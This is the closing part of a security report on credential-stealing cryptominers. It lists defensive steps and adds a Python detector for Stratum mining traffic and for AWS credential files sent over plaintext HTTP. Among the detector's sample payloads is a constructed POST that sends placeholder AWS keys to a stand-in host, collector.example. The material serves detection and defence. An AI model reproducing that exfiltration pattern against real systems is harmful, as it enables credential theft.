• Identify the systems that store AWS credential files, and then delete the files if they’re not needed. It is common for development credentials to accidentally be left on production systems.
• Use firewall rules to limit access to Docker APIs. We recommend a whitelist approach for your firewall ruleset.
• Check network traffic for connections to mining pools or connections that use the Stratum mining protocol.
• Check for any connections that send the AWS credentials file over HTTP.
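
One way to apply the last two checks to captured TCP payloads, as an added example that is not from the original report: it flags newline-delimited JSON-RPC messages that use Stratum method names, and plaintext HTTP requests whose body contains AWS shared-credentials keys. The function names and sample payloads are constructed for illustration.

```python
import json
import re

# Stratum is newline-delimited JSON-RPC; these are its standard method names.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                   "mining.notify", "mining.set_difficulty"}
# Key names used in an AWS shared credentials file (~/.aws/credentials).
AWS_KEY_RE = re.compile(
    rb"(?im)^\s*aws_(access_key_id|secret_access_key|session_token)\s*=")
HTTP_REQ_RE = re.compile(rb"(POST|PUT|GET) \S+ HTTP/1\.[01]\r\n")

def is_stratum(payload: bytes) -> bool:
    """True if any JSON line in the payload looks like a Stratum call."""
    for line in payload.splitlines():
        try:
            msg = json.loads(line)
        except ValueError:  # not JSON, or not decodable text
            continue
        if not isinstance(msg, dict):
            continue
        method, params = msg.get("method"), msg.get("params")
        if isinstance(method, str) and method in STRATUM_METHODS:
            return True
        # Monero-style pools: "login" whose params object carries the wallet.
        if method == "login" and isinstance(params, dict) and "login" in params:
            return True
    return False

def leaks_aws_credentials(payload: bytes) -> bool:
    """True if a plaintext HTTP request body contains AWS credential keys."""
    if not HTTP_REQ_RE.match(payload):
        return False
    return bool(AWS_KEY_RE.search(payload.partition(b"\r\n\r\n")[2]))

# Constructed sample payloads (placeholders, not real keys or wallets).
SAMPLES = {
    "btc_stratum": b'{"id": 1, "method": "mining.subscribe", "params": []}\n',
    "xmr_login": b'{"id":1,"jsonrpc":"2.0","method":"login",'
                 b'"params":{"login":"WALLET_PLACEHOLDER","pass":"x"}}\n',
    "cred_post": b"POST /upload HTTP/1.1\r\nHost: collector.example\r\n\r\n"
                 b"[default]\naws_access_key_id = AKIAEXAMPLEEXAMPLE00\n"
                 b"aws_secret_access_key = EXAMPLESECRETPLACEHOLDER\n",
    "plain_get": b"GET /index.html HTTP/1.1\r\nHost: www.example\r\n\r\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, is_stratum(data), leaks_aws_credentials(data))
```

Matching on payload content only works for unencrypted sessions; pool traffic over TLS needs destination-based checks instead.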

Cado also credited other security research efforts against the cryptominers, such as Trend Micro, Malware Hunter Team, and r3dbU7z.